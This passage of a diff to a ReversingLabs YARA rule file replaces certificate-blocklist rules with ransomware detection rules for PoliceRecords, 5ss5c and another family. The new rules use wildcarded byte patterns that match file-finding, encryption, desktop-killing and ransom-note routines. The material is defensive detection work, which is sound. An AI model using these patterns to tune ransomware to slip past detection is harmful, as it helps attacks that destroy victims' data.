+            ?? ?? ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ??
+            ?? 8D 45 ?? E8 ?? ?? ?? ?? BB ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 8D 85
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 83 FB ?? 7F ??
+            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ??
+            ?? 8D 45 ?? E8 ?? ?? ?? ?? 43 83 FB ?? 75 ?? 8B 85 ?? ?? ?? ?? 8B D0 8D 45 ?? E8 ??
+            ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8B D0 8B 8D ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 83
+            BD ?? ?? ?? ?? ?? 75 ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 75 ?? 8D 45 ?? BA
+        }
+		$encrypt_files_p3 = {
+            E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8B D0 B9 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ??
+            EB ?? 8D 45 ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 33 D2 8B 45 ?? 8B
+            08 FF 51 ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 75 ?? 8D 45 ??
+            E8 ?? ?? ?? ?? 8B D0 B9 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8B D0 B9 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 55 E8 ?? ?? ?? ?? 59 55 E8 ?? ??
+            ?? ?? 59 EB ?? 55 E8 ?? ?? ?? ?? 59 A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 B9 ?? ?? ??
+            ?? 8B 45 ?? E8 ?? ?? ?? ?? 55 E8 ?? ?? ?? ?? 59 C6 85 ?? ?? ?? ?? ?? 8B 45 ?? E8 ??
+            ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? 50 8B 45 ?? E8 ?? ?? ?? ?? 50
+            E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 EB ?? E9 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ??
+            64 FF 30 64 89 20 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 EB ?? E9 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ??
+            ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8D 45 ??
+            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Adobe Systems" and pe.signatures [ i ] . serial == "58:a5:41:d5:0f:9e:2f:ab:43:80:c6:a2:ed:43:3b:82" and 1341792000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_5F273626859Ae4Bc4Becbbeb71E2Ab2D : INFO FILE
+rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Policerecords : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "The digital certificate has leaked."
+		description = "Yara rule that detects PoliceRecords ransomware."
 		author = "ReversingLabs"
-		id = "a80dcaba-73f9-51d0-a75a-b6348fd305c6"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "bacd3f98-a069-58ca-8423-01fcef7d4062"
+		date = "2022-08-02"
+		modified = "2022-08-02"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1380-L1396"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/ByteCode.MSIL.Ransomware.PoliceRecords.yara#L1-L79"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "c8be504f075041508f299b1df03d9cb9e58d9a89f49b7a926676033d18b108ba"
+		logic_hash = "55cb1a5d030c47abb1a9ca9970fb19b3124128e409bc9515c173c33b2bb49a16"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "PoliceRecords"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$encrypt_files = {
+            00 72 ?? ?? ?? ?? 0A 73 ?? ?? ?? ?? 0B 07 06 6F ?? ?? ?? ?? 0C 04 0D 09 18 73 ?? ?? ??
+            ?? 13 ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 08 08 6F ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 13 ??
+            03 19 73 ?? ?? ?? ?? 13 ?? 2B ?? 11 ?? 11 ?? D2 6F ?? ?? ?? ?? 00 11 ?? 6F ?? ?? ?? ??
+            25 13 ?? 15 FE 01 16 FE 01 13 ?? 11 ?? 2D ?? 11 ?? 6F ?? ?? ?? ?? 00 11 ?? 6F ?? ?? ??
+            ?? 00 11 ?? 6F ?? ?? ?? ?? 00 00 DE ?? 26 00 00 DE ?? 2A
+        }
+		$find_files = {
+            11 ?? 11 ?? 9A 13 ?? 00 00 07 11 ?? 11 ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ??
+            00 11 ?? 28 ?? ?? ?? ?? 00 00 DE ?? 26 00 00 DE ?? 00 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E
+            69 32 ?? 00 DE ?? 26 00 00 DE ?? 17 8D ?? ?? ?? ?? 25 16 72 ?? ?? ?? ?? A2 0C 16 13 ??
+            2B ?? 00 00 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 08 11 ?? 9A 28 ?? ?? ?? ?? 00
+            72 ?? ?? ?? ?? 08 11 ?? 9A 28 ?? ?? ?? ?? 18 28 ?? ?? ?? ?? 00 00 DE ?? 26 00 00 DE ??
+            00 11 ?? 17 58 13 ?? 11 ?? 08 8E 69 FE 04 13 ?? 11 ?? 2D ?? 00 00 72 ?? ?? ?? ?? 1D 28
+            ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 1D 28 ?? ?? ?? ?? 72 ?? ??
+            ?? ?? 28 ?? ?? ?? ?? 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 00 DE ?? 26 00 00 DE ?? 7E ?? ??
+            ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0D 09 72 ?? ?? ?? ?? 17 8C ?? ?? ?? ?? 1A 6F ?? ??
+            ?? ?? 00 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 72 ?? ?? ?? ?? 16 8C
+            ?? ?? ?? ?? 1A 6F ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11
+            ?? 72 ?? ?? ?? ?? 17 8C ?? ?? ?? ?? 1A 6F ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 72 ?? ?? ?? ??
+            6F ?? ?? ?? ?? 13 ?? 11 ?? 72 ?? ?? ?? ?? 17 8C ?? ?? ?? ?? 1A 6F ?? ?? ?? ?? 00 7E ??
+            ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 17 6F
+            ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 72 ?? ?? ?? ??
+            72 ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 00 07 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 73 ?? ?? ?? ??
+            13 ?? 11 ?? 6F ?? ?? ?? ?? 00 73 ?? ?? ?? ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 26 2A
+        }
+		$desktop_kill_tick = {
+            02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 16 28 ?? ?? ?? ?? 0A 06 72 ?? ?? ?? ?? 28 ?? ?? ??
+            ?? 0B 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C 08 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0D 09 72 ?? ??
+            ?? ?? 28 ?? ?? ?? ?? 13 ?? 07 28 ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 00 07 28 ?? ?? ?? ?? 00
+            00 11 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 00 11 ?? 28 ?? ?? ?? ?? 00 00 02 7B ?? ?? ??
+            ?? 6F ?? ?? ?? ?? 00 2A
+        }
+		$drop_ransom_note = {
+            00 16 28 ?? ?? ?? ?? 0A 06 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 00 07 72 ??
+            ?? ?? ?? 6F ?? ?? ?? ?? 00 07 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 07 72 ?? ?? ?? ?? 6F ??
+            ?? ?? ?? 00 07 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 07 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 07
+            72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 07 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 00 DE ?? 07 2C ??
+            07 6F ?? ?? ?? ?? 00 DC 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28
+            ?? ?? ?? ?? 26 2A
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Adobe Systems" and pe.signatures [ i ] . serial == "5f:27:36:26:85:9a:e4:bc:4b:ec:bb:eb:71:e2:ab:2d" and 1341792000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $encrypt_files ) and ( $desktop_kill_tick ) and ( $drop_ransom_note )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_B1Ad46Ce4Db160B348C24F66C9663178 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_5Ss5C : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "The digital certificate has leaked."
+		description = "Yara rule that detects 5ss5c ransomware."
 		author = "ReversingLabs"
-		id = "df34eb28-18ec-568b-8257-0b2f7959868c"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "c69f44de-8e48-518d-87bf-d21d11223a2f"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1398-L1414"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.5ss5c.yara#L1-L267"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "59ce2b7a2e881853d07446b3dda74b296f2be09651364d0e131552cf76dab751"
+		logic_hash = "74fcec568906a01dade7091c63cffbe4afa49c4705d9c1f21d10b4eee655a805"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "5ss5c"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Adobe Systems" and pe.signatures [ i ] . serial == "b1:ad:46:ce:4d:b1:60:b3:48:c2:4f:66:c9:66:31:78" and 1341792000 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_256541E204619033F8B09F9Eb7C88Ef8 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "d4a5eb19-2964-5d3a-b4c5-ee4396e76814"
-		date = "2020-08-05"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1416-L1432"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "e33cedf1dd24ac73f77461de0cef25cad57909be2a69469fec450ead7da85c65"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$find_files_p1 = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
+            33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B FA 89 BD ?? ?? ?? ?? 8B F1
+            8B 5D ?? 33 C0 89 9D ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 45 ?? 89 45 ?? 6A ?? 89 45 ??
+            89 45 ?? 89 45 ?? E8 ?? ?? ?? ?? 89 45 ?? 8D 4D ?? 83 C4 ?? C7 00 ?? ?? ?? ?? C7 40
+            ?? ?? ?? ?? ?? 8B 45 ?? 89 08 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ??
+            57 8D 8D ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 6A ?? C7 45 ??
+            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 8D 4D
+            ?? C7 00 ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? 8B 45 ?? 89 08 C7 45 ?? ?? ?? ?? ?? C7 45
+            ?? ?? ?? ?? ?? C6 45 ?? ?? C6 45 ?? ?? 6A ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 8D 4D ?? C7 00 ?? ?? ?? ?? C7 40 ??
+            ?? ?? ?? ?? 8B 45 ?? 89 08 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? C6
+            45 ?? ?? 6A ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ??
+            ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 83 C4 ?? C7
+            00 ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 08 C7 85 ?? ?? ?? ?? ?? ??
+            ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 0F 57 C0 8B 43 ?? 66 0F D6
+        }
+		$find_files_p2 = {
+            45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 45 ?? C6 45
+            ?? ?? 8B 3B 85 FF 74 ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ??
+            ?? 8B 47 ?? 8D 8D ?? ?? ?? ?? 89 45 ?? 8D 45 ?? 89 47 ?? 89 7D ?? E8 ?? ?? ?? ?? 6A
+            ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 3B
+            C8 74 ?? 83 78 ?? ?? 8D 48 ?? 72 ?? 8B 09 FF 70 ?? 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 83 BD ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 51
+            50 FF 15 ?? ?? ?? ?? 8B C8 89 8D ?? ?? ?? ?? 83 F9 ?? 0F 84 ?? ?? ?? ?? 8B D8 66 66
+            0F 1F 84 00 ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ??
+            8B 8D ?? ?? ?? ?? 0F 43 45 ?? C7 45 ?? ?? ?? ?? ?? C6 00 ?? 8D 41 ?? 83 79 ?? ?? 72
+            ?? 8B 00 FF 71 ?? 8D 4D ?? 50 E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 8B C8 E8 ?? ?? ??
+            ?? 8D 8D ?? ?? ?? ?? 8B D0 8D 79 ?? 8A 01 41 84 C0 75 ?? 2B CF 8D 85 ?? ?? ?? ?? 51
+            50 8B CA E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B D8 F6 85 ??
+            ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 33 FF FF B7 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 85
+            C0 0F 85 ?? ?? ?? ?? 83 C7 ?? 81 FF ?? ?? ?? ?? 72 ?? 68 ?? ?? ?? ?? 50 8D 85 ?? ??
+            ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 85 ??
+            ?? ?? ?? 8B 9D ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 83 CB ?? C7 85 ?? ?? ?? ?? ?? ??
+            ?? ?? 50 89 9D ?? ?? ?? ?? 89 5D ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? C7
+        }
+		$find_files_p3 = {
+            45 ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 6A ?? 8B 40 ?? C7 84 05 ?? ?? ?? ?? ?? ?? ?? ??
+            8B 85 ?? ?? ?? ?? 8B 48 ?? 8D 41 ?? 89 84 0D ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 51 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 85 C0 75
+            ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 8B 40 ?? 03 C8 33 C0 39 41 ?? 0F 94 C0
+            8D 04 85 ?? ?? ?? ?? 0B 41 ?? 50 E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 55 ?? 83 7D ?? ?? 8D
+            8D ?? ?? ?? ?? FF 75 ?? 0F 43 55 ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 6A ?? 8B
+            40 ?? 03 C8 33 C0 39 41 ?? 0F 94 C0 8D 04 85 ?? ?? ?? ?? 0B 41 ?? 50 E8 ?? ?? ?? ??
+            8B 5D ?? 8D 55 ?? 53 FF B5 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 8B 85 ??
+            ?? ?? ?? 8B 40 ?? 85 FF 0F 85 ?? ?? ?? ?? C7 84 05 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ??
+            ?? ?? ?? 8B 48 ?? 8D 41 ?? 89 84 0D ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B
+            85 ?? ?? ?? ?? 8B 40 ?? C7 84 05 ?? ?? ?? ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 48 ??
+            8D 41 ?? 89 84 0D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 C7 85 ?? ?? ?? ?? ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? E9 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8D 51
+            ?? 0F 1F 80 ?? ?? ?? ?? 8A 01 41 84 C0 75 ?? 2B CA 8D 85 ?? ?? ?? ?? 51 50 8D 4D
+        }
+		$find_files_p4 = {
+            E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 2B CA 8D 85 ?? ?? ??
+            ?? 51 50 8D 4D ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 45 ?? 83 7D ?? ?? 8B FC 0F 43 45 ?? C7
+            07 ?? ?? ?? ?? C7 47 ?? ?? ?? ?? ?? 89 47 ?? C6 45 ?? ?? 8B 5D ?? 85 DB 74 ?? 6A ??
+            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B CF E8 ?? ?? ?? ?? 8B 43 ?? 8D 8D ?? ?? ?? ?? 89
+            47 ?? 89 7B ?? 89 1F E8 ?? ?? ?? ?? 8B 45 ?? 8D 4D ?? 83 EC ?? 83 7D ?? ?? 8B FC 0F
+            43 4D ?? 03 C1 C7 07 ?? ?? ?? ?? C7 47 ?? ?? ?? ?? ?? 89 47 ?? C6 45 ?? ?? 8B 5D ??
+            85 DB 74 ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B CF E8 ?? ?? ?? ?? 8B 43 ?? 8D
+            8D ?? ?? ?? ?? 89 47 ?? 89 7B ?? 89 1F E8 ?? ?? ?? ?? 83 EC ?? 8D 45 ?? 83 7D ?? ??
+            8B FC 0F 43 45 ?? C7 07 ?? ?? ?? ?? C7 47 ?? ?? ?? ?? ?? 89 47 ?? C6 45 ?? ?? 8B 5D
+            ?? 85 DB 74 ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B CF E8 ?? ?? ?? ?? 8B 43 ??
+            8D 8D ?? ?? ?? ?? 89 47 ?? 89 7B ?? 89 1F E8 ?? ?? ?? ?? BA ?? ?? ?? ?? C6 45
+        }
+		$find_files_p5 = {
+            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ??
+            ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ??
+            ?? 8D 55 ?? 83 7D ?? ?? 8B 4D ?? 0F 43 55 ?? C7 45 ?? ?? ?? ?? ?? 89 4D ?? 83 F9 ??
+            72 ?? 49 83 C8 ?? 3B C8 89 4D ?? 0F 42 C1 03 C2 0F 1F 40 ?? 80 38 ?? 75 ?? 0F B6 08
+            80 F9 ?? 75 ?? 33 C9 EB ?? 1B C9 83 C9 ?? 85 C9 74 ?? 3B C2 74 ?? 48 EB ?? 2B C2 EB
+            ?? 83 C8 ?? 6A ?? 8D 78 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ??
+            ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ??
+            83 C4 ?? C7 00 ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 08 C6 45 ?? ??
+            8B 45 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ??
+            ?? ?? 3B C7 0F 82 ?? ?? ?? ?? 2B C7 C7 45 ?? ?? ?? ?? ?? 83 C9 ?? 89 45 ?? 83 F8 ??
+            0F 42 C8 83 7D ?? ?? 8D 45 ?? 0F 43 45 ?? 51 03 C7 8D 8D ?? ?? ?? ?? 50 E8 ?? ?? ??
+            ?? 83 8D ?? ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 8D 85 ?? ?? ??
+            ?? FF B5 ?? ?? ?? ?? 8D 4D ?? 50 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D
+        }
+		$find_files_p6 = {
+            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 45 ?? 83 7D ?? ?? 8B FC 0F 43 45 ?? C7 07
+            ?? ?? ?? ?? C7 47 ?? ?? ?? ?? ?? 89 47 ?? C6 45 ?? ?? 8B 5D ?? 85 DB 74 ?? 6A ?? 8D
+            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B CF E8 ?? ?? ?? ?? 8B 43 ?? 8D 8D ?? ?? ?? ?? 89 47
+            ?? 89 7B ?? 89 1F E8 ?? ?? ?? ?? 8B 45 ?? 8D 4D ?? 83 EC ?? 83 7D ?? ?? 8B FC 0F 43
+            4D ?? 03 C1 C7 07 ?? ?? ?? ?? C7 47 ?? ?? ?? ?? ?? 89 47 ?? C6 45 ?? ?? 8B 5D ?? 85
+            DB 74 ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B CF E8 ?? ?? ?? ?? 8B 43 ?? 8D 8D
+            ?? ?? ?? ?? 89 47 ?? 89 7B ?? 89 1F E8 ?? ?? ?? ?? 83 EC ?? 8D 45 ?? 83 7D ?? ?? 8B
+            FC 0F 43 45 ?? C7 07 ?? ?? ?? ?? C7 47 ?? ?? ?? ?? ?? 89 47 ?? C6 45 ?? ?? 8B 5D ??
+            85 DB 74 ?? 6A ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B CF E8 ?? ?? ?? ?? 8B 43 ?? 8D
+            8D ?? ?? ?? ?? 89 47 ?? 89 7B ?? 89 1F E8 ?? ?? ?? ?? BA ?? ?? ?? ?? C6 45 ?? ?? 8D
+            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ??
+            ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ??
+            33 FF 66 66 0F 1F 84 00 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? FF B7 ?? ?? ?? ?? 0F 43 45
+            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 68 ?? ??
+            ?? ?? 0F 43 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 83 C7 ?? 83 FF
+            ?? 72 ?? 8B 5D ?? 85 DB 0F 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ??
+            ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 8B 46 ?? 8D 4D ?? 51 39 46 ?? 74 ?? 8B C8 E8 ?? ?? ??
+            ?? 8B 7E ?? 8D 8D ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B 0E 8D 41 ?? F7 D9 1B C9 23 C8
+        }
+		$find_files_p7 = {
+            74 ?? 8B 01 85 C0 74 ?? 39 78 ?? 72 ?? 77 ?? C7 00 ?? ?? ?? ?? 8B 01 8B 40 ?? 89 01
+            EB ?? 8D 48 ?? 8B 01 85 C0 75 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 46 ?? ?? EB ??
+            50 8B CE E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
+            85 C0 75 ?? 8B 46 ?? 8D 4D ?? 51 39 46 ?? 74 ?? 8B C8 E8 ?? ?? ?? ?? 8B 7E ?? 8D 8D
